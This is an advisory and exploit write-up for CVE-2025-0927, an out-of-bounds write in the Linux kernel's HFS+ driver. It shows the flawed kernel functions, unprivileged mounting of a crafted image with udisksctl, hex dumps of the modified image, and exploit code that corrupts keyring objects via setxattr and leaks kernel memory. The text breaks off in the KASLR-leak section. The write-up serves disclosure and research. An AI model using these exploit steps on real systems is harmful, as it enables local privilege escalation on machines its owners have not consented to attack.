CVE-2025-0927: Linux Kernel hfsplus Slab Out-of-Bounds Write Analysis (Exploit)

admin


March 26, 2025, 14:04:14


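Summary

This advisory describes an out-of-bounds write vulnerability in the Linux kernel that allows local privilege escalation on Ubuntu 22.04 for users with an active session.

Credit

An independent security researcher working with SSD Secure Disclosure.

Vendor Response

Ubuntu has released the following advisory and fix: https://ubuntu.com/security/CVE-2025-0927

Affected Versions

Linux kernel, up to version 6.12.0
Ubuntu 22.04 with Linux kernel 6.5.0-18-generic

Technical Analysis

This is a vulnerability in the HFS+ driver of the Linux kernel. Interestingly, it has been in the kernel tree since the initial git repository import in 2005 (commit 1da177, i.e. Linux-2.6.12-rc2).

HFS+ was the primary Mac OS X file system until Apple File System (APFS) replaced it in 2017 with the release of macOS High Sierra. It is based on B-tree data structures and is well documented. The vulnerability itself is a buffer overflow in the handling of B-tree nodes. In certain situations, the function hfs_bnode_read_key, found in fs/hfsplus/bnode.c, is used to fill a kernel buffer from the file system, and the function itself does not check any boundary conditions related to the key size.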

void hfs_bnode_read_key(struct hfs_bnode *node, void *key, int off)
{
    struct hfs_btree *tree;
    int key_len;

    tree = node->tree;
    if (node->type == HFS_NODE_LEAF ||
        tree->attributes & HFS_TREE_VARIDXKEYS ||
        node->tree->cnid == HFSPLUS_ATTR_CNID)
        key_len = hfs_bnode_read_u16(node, off) + 2;
    else
        key_len = tree->max_key_len + 2;

    hfs_bnode_read(node, key, off, key_len);

}

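Our understanding is that the author must have assumed that this function is only called in contexts where the corresponding key stored in the B-tree record has already been validated to have a sane length. In particular, hfs_bnode_find enforces constraints on records to ensure that key sizes stay within the entry size. In addition, when manipulating records inside a B-tree node, the code in hfs_brec_insert relies on __hfs_brec_find to determine the appropriate index; that function is a logarithmic search which applies a sanity check to every record it encounters via hfs_brec_keylen: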

/* Get the length of the key from a keyed record */
u16 hfs_brec_keylen(struct hfs_bnode *node, u16 rec)
{
    u16 retval, recoff;

    if (node->type != HFS_NODE_INDEX && node->type != HFS_NODE_LEAF)
        return 0;

    if ((node->type == HFS_NODE_INDEX) &&
       !(node->tree->attributes & HFS_TREE_VARIDXKEYS) &&
       (node->tree->cnid != HFSPLUS_ATTR_CNID)) {
        retval = node->tree->max_key_len + 2;
    } else {
        recoff = hfs_bnode_read_u16(node,
            node->tree->node_size - (rec + 1) * 2);
        if (!recoff)
            return 0;
        if (recoff > node->tree->node_size - 2) {
            pr_err("recoff %d too large\n", recoff);
            return 0;
        }

        retval = hfs_bnode_read_u16(node, recoff) + 2;
        if (retval > node->tree->max_key_len + 2) {
            pr_err("keylen %d too large\n",
                retval);
            retval = 0;
        }
    }
    return retval;
}

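This code looks like it has some integer overflow issues, but the calling contexts handle those cases correctly. According to the specification a B-tree header may define its own max_key_len value, but in this driver hfs_btree_open actually forces the maximum key size of each file to be strictly equal to a constant known at compile time: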

case HFSPLUS_ATTR_CNID:
        if (tree->max_key_len != HFSPLUS_ATTR_KEYLEN - sizeof(u16)) {
            pr_err("invalid attributes max_key_len %d\n",
                tree->max_key_len);
            goto fail_page;
        }

/* HFS+ attributes tree key */
struct hfsplus_attr_key {
    __be16 key_len;
    __be16 pad;
    hfsplus_cnid cnid;
    __be32 start_block;
    struct hfsplus_attr_unistr key_name;
} __packed;

#define HFSPLUS_ATTR_KEYLEN sizeof(struct hfsplus_attr_key)

When manipulating nodes, the extracted keys are stored in a buffer from the generic kmalloc caches whose size is fixed per B-tree, as seen in bfind.c:

int hfs_find_init(struct hfs_btree *tree, struct hfs_find_data *fd)
{
    void *ptr;

    fd->tree = tree;
    fd->bnode = NULL;
    ptr = kmalloc(tree->max_key_len * 2 + 4, GFP_KERNEL);
    if (!ptr)
        return -ENOMEM;
    fd->search_key = ptr;
    fd->key = ptr + tree->max_key_len + 2;
    hfs_dbg(BNODE_REFS, "find_init: %d (%p)\n",
        tree->cnid, __builtin_return_address(0));
    mutex_lock_nested(&tree->tree_lock,
            hfsplus_btree_lock_class(tree));
    return 0;
}

For the attributes tree, this results in a max_key_len of 0x10a and an allocation of 0x218 bytes.
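The arithmetic behind these two numbers can be checked with a few lines of Python. This is only a sketch: the field sizes are read off the struct hfsplus_attr_key definition quoted above, HFSPLUS_ATTR_MAX_STRLEN = 127 is assumed from fs/hfsplus/hfsplus_raw.h, and kmalloc_bucket is a simplified, hypothetical stand-in for the real size-class selection (it ignores the 96- and 192-byte caches).

```python
# Sketch: reproduce max_key_len, the hfs_find_init buffer size and its kmalloc size class.
HFSPLUS_ATTR_MAX_STRLEN = 127  # assumption: value taken from fs/hfsplus/hfsplus_raw.h


def attr_keylen() -> int:
    """sizeof(struct hfsplus_attr_key) for the packed layout quoted above."""
    unistr = 2 + 2 * HFSPLUS_ATTR_MAX_STRLEN  # __be16 length + UTF-16 name
    return 2 + 2 + 4 + 4 + unistr             # key_len, pad, cnid, start_block, key_name


def find_buffer_size(max_key_len: int) -> int:
    """Mirrors kmalloc(tree->max_key_len * 2 + 4, GFP_KERNEL) in hfs_find_init."""
    return max_key_len * 2 + 4


def kmalloc_bucket(size: int) -> int:
    """Simplified size class: round up to the next power of two."""
    bucket = 8
    while bucket < size:
        bucket *= 2
    return bucket


max_key_len = attr_keylen() - 2  # HFSPLUS_ATTR_KEYLEN - sizeof(u16)
print(hex(max_key_len), hex(find_buffer_size(max_key_len)),
      kmalloc_bucket(find_buffer_size(max_key_len)))
```

Under these assumptions the 0x218-byte buffer is served from the 1024-byte size class, which is why the rest of the write-up keeps talking about kmalloc-1k.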

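However, not every calling context upholds the invariant that hfs_bnode_read_key relies on, and this is what leads to the vulnerability.

The specification allows a B-tree to use nodes much larger than the default size of 0x2000, up to 0x8000, which in turn allows correspondingly large records and keys to be stored.

Crucially, the function hfs_brec_find has a logic flaw: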

/* Traverse a B*Tree from the root to a leaf finding best fit to key */
/* Return allocated copy of node found, set recnum to best record */
int hfs_brec_find(struct hfs_find_data * fd, search_strategy_t do_key_compare){
    struct hfs_btree * tree;
    struct hfs_bnode * bnode;
    u32 nidx, parent;
    __be32 data;
    int height, res;

    tree = fd -> tree;
    if (fd -> bnode)
      hfs_bnode_put(fd -> bnode);
    fd -> bnode = NULL;
    nidx = tree -> root;
    if (!nidx)
      return -ENOENT;
    height = tree -> depth;

    [..]
    for (;;) {
      [..]
      // Go through records - the writeup author's comment
      __hfs_brec_find(bnode, fd, do_key_compare);

    }

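If the B-tree we are working with has no root node specified, i.e. the root is a null pointer, the code stops and returns -ENOENT.

In calling contexts where this is not a terminating condition, such as hfsplus_create_attr, the code goes on and tries to insert at the first position it can: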

err = hfs_brec_find(&fd, hfs_find_rec_by_key);
if (err != -ENOENT) {
    if (!err)
        err = -EEXIST;
    goto failed_create_attr;
}

err = hfs_brec_insert(&fd, entry_ptr, entry_size);
if (err)
    goto failed_create_attr;

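Note, however, that in this case __hfs_brec_find is never run on any record, and, as established above, it is also the function responsible for bounds checking the key size.

The insertion code in hfs_brec_insert, on the other hand, does call the vulnerable function hfs_bnode_read_key directly: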

/*
 * update parent key if we inserted a key
 * at the start of the node and it is not the new node
 */

if (!rec && new_node != node) {
  hfs_bnode_read_key(node, fd -> search_key, data_off + size);
  hfs_brec_update_parent(fd);
}

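To trigger the buffer overflow, it is enough to insert a new record whose key sorts lower in the B-tree key ordering than the first record of that particular node. The root node of the attributes B-tree is also under attacker control, which allows the attacker to set it to null.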
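To make the missing bounds check concrete, here is a small user space model of the length computation. It is a sketch rather than the kernel code: it only covers the leaf-node branch of hfs_bnode_read_key, it assumes the destination is fd->search_key at the very start of a kmalloc-1k slot (as hfs_find_init sets it up), and the helper names are made up for illustration.

```python
import struct

SLOT_SIZE = 1024  # kmalloc-1k object size


def key_copy_len(node: bytes, off: int) -> int:
    """Bytes hfs_bnode_read_key copies for a leaf record: on-disk key_len + 2."""
    (key_len,) = struct.unpack_from(">H", node, off)  # HFS+ is big-endian on disk
    return key_len + 2


def spill_into_next_slot(copy_len: int, slot_size: int = SLOT_SIZE) -> int:
    """Bytes that land in the neighbouring slab object (0 if the copy fits)."""
    return max(0, copy_len - slot_size)


# A sane record (key_len = 0x1e) versus a corrupted one (key_len = 0x416).
sane = bytes(14) + struct.pack(">H", 0x001E)
evil = bytes(14) + struct.pack(">H", 0x0416)
print(spill_into_next_slot(key_copy_len(sane, 14)),
      spill_into_next_slot(key_copy_len(evil, 14)))
```

Nothing in this path compares the on-disk length against max_key_len, so the amount of data written past the slot is entirely up to whoever crafted the image.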

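It is worth noting that this driver, along with many block device drivers, has been fuzzed fairly extensively before, yet apparently this particular state was never reached by the fuzzers, even though it is a fairly simple bug to spot when analyzing the code base by hand.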

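Exploitability

First of all, the attentive reader will have realized by now that in order to trigger these conditions and ultimately exploit the vulnerability, an attacker must be able to mount a specially crafted file system.

Historically, this has been restricted to processes with the CAP_SYS_ADMIN capability. Since the introduction of namespaces, the kernel community has been looking at ways to limit how much the system has to trust the underlying file system, so that mounting could be made more permissive. Finding a way to do this is generally considered too hard a problem; there is, however, an exception for file systems that declare themselves safe for use inside a user namespace through the FS_USERNS_MOUNT flag.

The following was also mentioned when that proposal was discussed: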

> Figuring out how to make semantics safe is what we are talking about.
>
> Once we sort out the semantics we can look at the handful of filesystems
> like fuse where the extra attack surface is not a concern.
>
> With that said desktop environments have for a long time been
> automatically mounting whichever filesystem you place in your computer,
> so in practice what this is really about is trying to align the kernel
> with how people use filesystems.

The key difference is that desktops only do this when you physically
plug in a device. With unprivileged mounts, a hostile attacker
doesn't need physical access to the machine to exploit lurking
kernel filesystem bugs. i.e. they can just use loopback mounts, and
they can keep mounting corrupted images until they find something
that works.

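So far these discussions have been rather theoretical: as far as I know, nobody had demonstrated a practical attack scenario using a malformed file system before this write-up.

So, for the record, the Linux kernel normally only allows users with CAP_SYS_ADMIN to mount, yet desktop and even server environments do let ordinary unprivileged users mount and automount file systems.

Specifically, recent Ubuntu Desktop and Server releases ship with default polkit rules that allow a user with an active local session to create loop devices and to mount, via udisks2, a range of block file systems commonly found on USB flash drives. Inspecting /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy shows: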

<action id="org.freedesktop.udisks2.filesystem-mount">
    <description>Mount a filesystem</description>
    [..]
     <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>
</action>

<action id="org.freedesktop.udisks2.loop-setup">
    <description>Manage loop devices</description>
    [..]
    <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <!-- NOTE: this is not a DoS because we are using /dev/loop-control -->
      <allow_active>yes</allow_active>
    </defaults>
  </action>

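In other words, an active ordinary (low-privileged) user can not only mount file systems but also set up loop devices backed by local files, using udisksctl as follows: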

DEVICE=$(udisksctl loop-setup -f malformed.raw | grep -o '/dev/loop[0-9]*')
udisksctl mount -b "$DEVICE"

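With allow_active set to "yes", the following holds for the user:

Active session: the user must be logged in and actively interacting with the system (for example, a local desktop session or a terminal).
No authentication required: the user can perform the action without authenticating (no password or privilege elevation needed).

Although, as far as I can tell, this is a design decision made for the sake of a more comfortable user experience, for the purposes of discussing the exploitation details I will refer to this capability as the "mount oracle*", stressing that it is a result of the distribution's user space configuration, which effectively bypasses the CAP_SYS_ADMIN restriction that the kernel itself imposes on ordinary users.

*The term oracle is widely used in theoretical computer science to study complexity classes which, through a mathematical device, gain magical access to computational power they would not normally have. I feel there is a strong enough analogy here to abuse the word.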

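Exploitation Strategy

Now that we have established that, for practical purposes, we can mount a specially crafted file of our choosing, and that Ubuntu and many other systems support the HFS+ file system, the only exercise left is to build an actual exploit for it.

The OOB write gives us plenty of control and a strong starting point. As described above, the buffer overflow lets us overwrite a buffer allocated in the generic slab cache kmalloc-1k with data of our choosing, with a size that is also of our choosing, up to 16 bits. Well, the exact size is limited by the node size, but that still means we can overwrite a 1024-byte buffer with up to nearly 0x8000 bytes of data.

In the past, many slab UAF and OOB exploits used the msg_msg structure for kernel info leaks and control of execution, since it is a nice elastic structure that is easy to control from user space, behaves well in exploitation scenarios, and can span multiple kmalloc cache sizes. Since the introduction of the kmalloc-cg-* caches, a vulnerable object and a spray object only land in the same slab cache if their allocation flags match.

msg_msg and other objects useful for heap spraying are now allocated with GFP_KERNEL_ACCOUNT, so our plain GFP_KERNEL allocation lands in a separate slab cache, apart from everything allocated with the accounting flag. On top of that, since version 6.6 the RANDOM_KMALLOC_CACHES configuration option hardens things further by introducing *multiple* generic slab caches for each size (named kmalloc-rnd-01-32, kmalloc-rnd-02-32 and so on).

Objects allocated through kmalloc() are then assigned "randomly" to one of these 16 caches, where the exact cache depends on the kmalloc() call site and a per-boot seed. More recently still, in 6.11, a patch by Kees Cook, inspired by the success of msg_msg-based exploits, introduced a separate set of kmalloc buckets through the kmem_buckets API, aimed specifically at stopping these attacks on msg_msg.

For most practical purposes, exploiting this bug on Ubuntu 22.04 with the 5.15 LTS kernel would be fairly easy using techniques that others have written about extensively. At the time of the research the 22.04 HWE kernel was 6.5, so I picked that as the target.

We will not dig deep into the internals of the SLUB allocator, since there is plenty of material online. Andrey Konovalov's recent talk at the Linux Security Summit is a good introduction to the topic. We will, however, try to keep things relatively self-contained.

Basically, our goal is to get hold of a bunch of dynamically allocated objects in kernel space that we control, corrupt their fields with our write primitive, use that to leak some kernel addresses to defeat KASLR, and then use further memory corruption to somehow achieve local privilege escalation.

Since distributions such as Ubuntu enable a range of hardening configuration options, we specifically assume that these are enabled: RANDOMIZE_BASE, SLAB_FREELIST_RANDOM, SLAB_FREELIST_HARDENED. SMEP, SMAP and KPTI can also be assumed to be present and enabled.

One option that Ubuntu does not set is CONFIG_STATIC_USERMODEHELPER, which makes it possible for an attacker with some arbitrary write primitive to overwrite the modprobe_path variable in kernel space and then escalate privileges easily with a few simple execve calls.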

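First Steps

So at this point our draft strategy looks like this:

Craft a malformed file system that can trigger the primitive

Mount the file system as an ordinary user using our "mount oracle"

Spray some useful objects into kmalloc-1k

Trigger the out-of-bounds write primitive to corrupt those objects and leak the KASLR base

Fix up the address of modprobe_path using the KASLR leak

Turn the primitive into an arbitrary write capability

Overwrite modprobe_path

Profit.

Let's start with the first step.

Creating a well-formed hfsplus file system is relatively easy with mkfs.hfsplus. The resulting volume follows the layout given in the specification.

All the structures are documented exhaustively in the technical note, and fs/hfsplus/hfsplus_raw.h contains all the relevant definitions that hfsplus uses at the block level. Although we looked into some tricks that use the volume to map file extents back onto the HFS+ control "metadata" to make the exploit prettier, we realized that at this point it would be overly complicated without any educational or write-up value, so we will not deal with anything concerning how the data in actual files is stored on the file system. For the sake of discussion, here are just a few important facts about HFS+:

The catalog file stores the directory and file structure of the volume. That is, when you run ls, what gets listed is based on it.
The attributes file stores all extended attributes and maps them to files and directories. Whenever you call setxattr, you would expect something to happen there.
Both of these are just good old B-tree data structures.
Unsurprisingly, extended attribute B-tree records are keyed by their extended attribute name.

Accordingly, creating a 128M hfsplus volume with mkfs yields a volume header like this: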

00000400: 482b 0004 8000 0100 3130 2e30 0000 0000 H+......10.0....
00000410: e330 03d6 e330 03d6 0000 0000 e330 03d6 .0...0.......0..
00000420: 0000 0000 0000 0000 0000 1000 0000 8000 ................
00000430: 0000 7cfd 0000 1702 0001 0000 0001 0000 ..|.............
00000440: 0000 0010 0000 0000 0000 0000 0000 0001 ................
00000450: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000460: 0000 0000 0000 0000 d809 6a4c 2408 d81f ..........jL$...
00000470: 0000 0000 0000 1000 0000 1000 0000 0001 ................
00000480: 0000 0001 0000 0001 0000 0000 0000 0000 ................
00000490: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004c0: 0000 0000 0010 0000 0010 0000 0000 0100 ................
000004d0: 0000 0002 0000 0100 0000 0000 0000 0000 ................
000004e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000500: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000510: 0000 0000 0010 0000 0010 0000 0000 0100 ................
00000520: 0000 *0c02* 0000 0100 0000 0000 0000 0000 ................
00000530: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000540: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000550: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000560: 0000 0000 0010 0000 0010 0000 0000 0100 ................
00000570: 0000 *0102* 0000 0100 0000 0000 0000 0000 ................
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

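Cross-referencing this with struct hfsplus_vh from the header file, and after consulting struct hfsplus_extent, it should be apparent that:

The catalog file is located at 0xc02000
The attributes file is located at 0x102000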
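The two offsets above can be derived mechanically from the volume header. The following is a minimal sketch, assuming the field offsets I read out of struct hfsplus_vh and struct hfsplus_fork_raw (blocksize at 0x28, catalog fork at 0x110, attributes fork at 0x160, first extent 16 bytes into a fork); the helper and constant names are hypothetical and only the first extent of each fork is considered.

```python
import struct

# Offsets relative to the start of the volume header (file offset 0x400).
# Assumption: derived by hand from struct hfsplus_vh in hfsplus_raw.h.
VH_BLOCKSIZE_OFF = 0x28
VH_CAT_FORK_OFF = 0x110
VH_ATTR_FORK_OFF = 0x160
FORK_FIRST_EXTENT_OFF = 16  # total_size (8) + clump_size (4) + total_blocks (4)


def first_extent_offset(vh: bytes, fork_off: int) -> int:
    """Byte offset in the image of the first extent of the given fork."""
    (block_size,) = struct.unpack_from(">I", vh, VH_BLOCKSIZE_OFF)
    start_block, _block_count = struct.unpack_from(
        ">II", vh, fork_off + FORK_FIRST_EXTENT_OFF)
    return start_block * block_size


# Rebuild just the relevant fields from the hexdump above.
vh = bytearray(0x200)
struct.pack_into(">I", vh, VH_BLOCKSIZE_OFF, 0x1000)
struct.pack_into(">II", vh, VH_CAT_FORK_OFF + 16, 0x0C02, 0x100)
struct.pack_into(">II", vh, VH_ATTR_FORK_OFF + 16, 0x0102, 0x100)
print(hex(first_extent_offset(vh, VH_CAT_FORK_OFF)),
      hex(first_extent_offset(vh, VH_ATTR_FORK_OFF)))
```

On a real image one would slice the header out with something like image[0x400:0x600] before calling the helper.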

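Both of these are B-trees, so seeking to these addresses we will find a header node and the B-tree header inside it.

Every node in the tree is either a header node, an index node, a map node or a leaf node; in any case they all share the same structure: a node descriptor at the start of the node, followed by the records, with the record offsets stored at the end of the node.

For now, we do not care much about the catalog file either. Given our bug, triggering the primitive only has a few requirements:

The root of the attributes B-tree must be a null pointer (to bypass the checks in __hfs_brec_find)
There must be a valid file on the file system, with world-writable permissions (coming from the catalog), on which we can set attributes
Whatever extended attribute we set must trigger hfs_bnode_read_key, which means the file should already have a bunch of extended attributes, and the one we insert must have a lower key than those, so that the code considers inserting it as the first record in the node

Oh, and to get meaningful results, our key length should be greater than 1024 so that it does something useful when overflowing in kmalloc-1k, but that is trivial.

To get there, one can mount the fresh HFS+ file system just created with mkfs. In the exploit we simply touch a file /hacked_node and add a few user extended attributes to it. That is, we add user.one, user.two, user.three and user.four as extended attributes with some dummy values.

After unmounting and checking what this looks like in binary, we only need to seek to the attributes file offset 0x102000 found above.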

00102000: 0000 0000 0000 0000 0100 0003 0000 0000 ................
00102010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00102020: 2000 010a 0000 0080 0000 007f 0000 0010 ...............

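The 0x2000 at 0x102020 indicates that nodes have that size, and since this is the header node, we have to seek 0x2000 forward to find the first node holding the actual funky data.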

00104000: 0000 0000 0000 0000 ff01 0004 0000 001e  ................
00104010: 0000 0000 0010 0000 0000 0009 0075 0073 .............u.s
00104020: 0065 0072 002e 0066 006f 0075 0072 0000 .e.r...f.o.u.r..
00104030: 0010 0000 0000 0000 0000 0000 0005 6475 ..............du
00104040: 6d6d 7900 001c 0000 0000 0010 0000 0000 mmy.............
00104050: 0008 0075 0073 0065 0072 002e 006f 006e  ...u.s.e.r...o.n
00104060: 0065 0000 0010 0000 0000 0000 0000 0000 .e..............
00104070: 0005 6475 6d6d 7900 0020 0000 0000 0010 ..dummy.. ......
00104080: 0000 0000 000a 0075 0073 0065 0072 002e  .......u.s.e.r..
00104090: 0074 0068 0072 0065 0065 0000 0010 0000 .t.h.r.e.e......
001040a0: 0000 0000 0000 0000 0005 6475 6d6d 7900 ..........dummy.
001040b0: 001c 0000 0000 0010 0000 0000 0008 0075 ...............u
001040c0: 0073 0065 0072 002e 0074 0077 006f 0000 .s.e.r...t.w.o..
001040d0: 0010 0000 0000 0000 0000 0000 0005 6475 ..............du
001040e0: 6d6d 7900 0000 0000 0000 0000 0000 0000 mmy.............
001040f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104110: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00104120: 0000 0000 0000 0000 0000 0000 0000 0000 ................

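I don't know about you, but to me that 0x1e at 0x10400e looks like a byte that is screaming to be overwritten with attacker-controlled data. Once we overwrite it, the vulnerable function will scoop up whatever garbage is in the file system and memcpy() it over the kmalloc-1k slab in memory.

How do we overwrite it? By writing those bytes into the file. After that, we just mount the file with our oracle and then perform a setxattr with an attribute that sorts lexicographically lowest in the node, which results in kernel space memory corruption.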

char *attr_value = "dummy";
int result = setxattr("/tmp/mnt0/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

if (result != 0)
    do_error_exit("setxattr attempt on vuln fs");
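For readers who want to poke at the image themselves, the key-length patch described above can be sketched in Python. This is an illustration only: it assumes a 14-byte node descriptor followed directly by the first record's hfsplus_attr_key, and the two helper names are hypothetical, not the ones used in the exploit.

```python
import struct

NODE_DESC_SIZE = 14  # next (4), prev (4), type (1), height (1), num_recs (2), reserved (2)


def parse_first_attr_key(node: bytes):
    """Return (key_len, cnid, name) of the first record in an attributes leaf node."""
    key_len, _pad, cnid, _start_block, name_len = struct.unpack_from(
        ">HHIIH", node, NODE_DESC_SIZE)
    name_off = NODE_DESC_SIZE + 14
    name = node[name_off:name_off + 2 * name_len].decode("utf-16-be")
    return key_len, cnid, name


def corrupt_first_key_len(node: bytearray, new_len: int) -> None:
    """Overwrite the on-disk key_len of the first record in place."""
    struct.pack_into(">H", node, NODE_DESC_SIZE, new_len)


# First 48 bytes of the leaf node at 0x104000, copied from the hexdump above.
leaf = bytearray(bytes.fromhex(
    "0000 0000 0000 0000 ff01 0004 0000 001e"
    "0000 0000 0010 0000 0000 0009 0075 0073"
    "0065 0072 002e 0066 006f 0075 0072 0000"))
print(parse_first_attr_key(leaf))
corrupt_first_key_len(leaf, 0x418 - 2)
print(hex(parse_first_attr_key(leaf)[0]))
```

The value 0x418 - 2 matches what the exploit later passes to its own corrupt_key_len helper; any length above 0x3fe would already reach past the 1024-byte slot.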

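We are done with the first part.

KASLR Leak

Now that we can corrupt and mount the file system and trigger an uncontrolled write primitive, it is time to pick some target objects. Luckily, spraying a bunch of struct user_key_payload into the target cache and overwriting them is a well-known trick. On 6.5, these still live in the generic kmalloc caches: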

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);

So the tool of the trade is to spawn a bunch of keys with keyctl() so that they land in kmalloc-1k, then trigger our primitive and overwrite datalen:

struct user_key_payload {
  struct rcu_head rcu; /* RCU destructor */
  unsigned short datalen; /* length of this data */
  char data[] __aligned(__alignof__(u64)); /* actual data */
};

Simply overwrite our slab slot with 0x400 plus sizeof(struct rcu_head) and sizeof(unsigned short) bytes, and hope for the best. In the exploit code this corresponds to:

void hack_hfs_keyring(unsigned char * hfs_buffer, size_t len, uint64_t dummy){
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    corrupt_key_len(hfs_buffer, len, 0x418 - 2);

    uint8_t payload[24] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xff, 0xff, 0x53, 0x53, 0x53, 0x53, 0x53, 0x53
    };

    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

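The sole purpose of this code is to corrupt a single key and overwrite its datalen with 0xffff, which gives us a very comfortable out-of-bounds read.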
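How the 0x418 bytes line up with the neighbouring object can be sketched as follows. The layout is an assumption on my part: sizeof(struct rcu_head) is taken to be 16 on x86-64, datalen therefore sits at offset 16 of the victim, and the 24-byte payload is assumed to start exactly at the slot boundary. build_overflow is a hypothetical helper, not part of the exploit.

```python
import struct

SLOT_SIZE = 0x400    # kmalloc-1k object size
RCU_HEAD_SIZE = 16   # assumption: sizeof(struct rcu_head) on x86-64


def build_overflow(filler: bytes = b"\x00") -> bytes:
    """Bytes copied by the corrupted key read: own slot, then the victim's header."""
    own_slot = filler * SLOT_SIZE
    victim_header = struct.pack(
        "<16sH6s",
        b"\x00" * RCU_HEAD_SIZE,  # struct rcu_head rcu
        0xFFFF,                   # unsigned short datalen
        b"S" * 6,                 # padding up to the u64-aligned data[]
    )
    return own_slot + victim_header


data = build_overflow()
print(hex(len(data)), data[SLOT_SIZE:].hex())
```

The last 24 bytes are identical to the payload array in hack_hfs_keyring, and the total length is the 0x418 that the corrupted key_len (plus its two length bytes) makes the kernel copy.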

If our kernel-mode mumbo jumbo succeeded, we can actually check for it from user space:

uint64_t get_keyring_leak(key_serial_t * id_buffer, uint32_t id_buffer_size)
{
    uint8_t buffer[USHRT_MAX] = {0};
    int32_t keylen;

    printf("[+] Checking sprayed keys for corruption\n");
    for (uint32_t i = 0; i < id_buffer_size; i++) {

        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, USHRT_MAX, 0);

        if (keylen < 0)
            continue;

        if (keylen > 1024) {
            printf("[+] Found corrupted key, triggering infoleak\n");
            return parse_leak(buffer, keylen);
        }
    }
    return 0;
}

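At this point, reading the key through the appropriate system call actually results in a dump of 65k of kernel memory.

This is all fun, but a random dump of kernel memory is not enough to defeat KASLR. We need some function pointers from which we can calculate addresses. Well, easier said than done.

Apart from a few academic papers that try to systematically study all slab-allocated elastic objects with a nice interface, there is not much in the way of a definitive guide to heap spraying. It is hard to do the subject justice, and for practical exploitation people always work directly with a specific kernel build. The tools of the trade are either pahole, used to look for good structures in the Linux kernel, although that tool is completely static and has no idea about user space taintability, or, alternatively, creating a Linux kernel database for CodeQL queries and using some smart filtering to narrow down the search for targets: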

/**
 * @name Find interesting objects for kernel heap exploitation
 * @id cpp/kernel-interesting-objects
 * @description Finds interesting objects for kernel heap exploitation
 * @kind problem
 * @precision low
 * @tags security kernel
 * @problem.severity error
 */

import cpp

class FlexibleArrayMember extends Field {
  FlexibleArrayMember() {
    exists(Struct s |
      this = s.getCanonicalMember(max(int j | s.getCanonicalMember(j) instanceof Field | j))
    ) and
    this.getUnspecifiedType() instanceof ArrayType and
    (
      this.getUnspecifiedType().(ArrayType).getArraySize() <= 1 or
      not this.getUnspecifiedType().(ArrayType).hasArraySize()
    )
  }
}

class KmallocCall extends FunctionCall {
  KmallocCall() { this.getTarget().hasName(["kmalloc", "kzalloc", "kvmalloc"]) }

  Expr getSizeArg() { result = this.getArgument(0) }

  string getFlag() {
    result =
      concat(Expr flag |
        flag = this.getArgument(1).getAChild*() and flag.getValueText().matches("%GFP%")
      |
        flag.getValueText(), "|"
      )
  }

  string getSize() {
    if this.getSizeArg().isConstant()
    then result = this.getSizeArg().getValue()
    else result = "unknown"
  }

  Type sizeofParam(Expr e) {
    result = e.(SizeofExprOperator).getExprOperand().getFullyConverted().getType()
    or
    result = e.(SizeofTypeOperator).getTypeOperand()
  }

  Struct getStruct() {
    exists(Expr sof |
      this.getSizeArg().getAChild*() = sof and
      this.sizeofParam(sof) = result
    )
  }

  string isFlexible() {
    this.getSize() = "unknown" and
    this.getStruct().getAField() instanceof FlexibleArrayMember and
    result = "true"
    or
    not this.getSize() = "unknown" and
    not this.getStruct().getAField() instanceof FlexibleArrayMember and
    result = "false"
  }
}

from KmallocCall kfc, Struct s
where
  s = kfc.getStruct() and
  not kfc.getSizeArg().isAffectedByMacro()
select kfc.getLocation(), kfc, s, s.getLocation(), s.getSize(), kfc.getFlag(), kfc.getSize(),
  kfc.getArgument(0), kfc.isFlexible()

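As a last resort, my Chuck Norris approach is to really throw away all those static analysis methods and set breakpoints in gdb.

After all, intercepting all kmalloc() calls and filtering for the allocations that end up in our generic kmalloc-1k slab cache is not that hard.

The results, however, were disappointing.

Cross-Cache Overread

Again, we would like to stay in kmalloc-1k the whole time, but it turns out that on 6.5 there are only a handful of elastic objects we can spray, and for our KASLR bypass we actually need an object containing some pointers that we can do arithmetic on, based on our kernel build, to recover the random offset added at boot.

Maybe I have overlooked something, but based on the resources of the kernel CTF community, the best candidate I found was tty_struct; smallkirby/kernelpwn has a summary of it.

The bad news, however, is that tty_struct is allocated with the accounting flag: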

/**
 * alloc_tty_struct - allocate a new tty
 * @driver: driver which will handle the returned tty
 * @idx: minor of the tty
 *
 * This subroutine allocates and initializes a tty structure.
 *
 * Locking: none - @tty in question is not exposed at this point
 */
struct tty_struct * alloc_tty_struct(struct tty_driver * driver, int idx){
    struct tty_struct * tty;
    tty = kzalloc(sizeof( * tty), GFP_KERNEL_ACCOUNT);
    if (!tty) return NULL;

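This means it is allocated in kmalloc-cg-1k rather than in kmalloc-1k. It is as simple as that.

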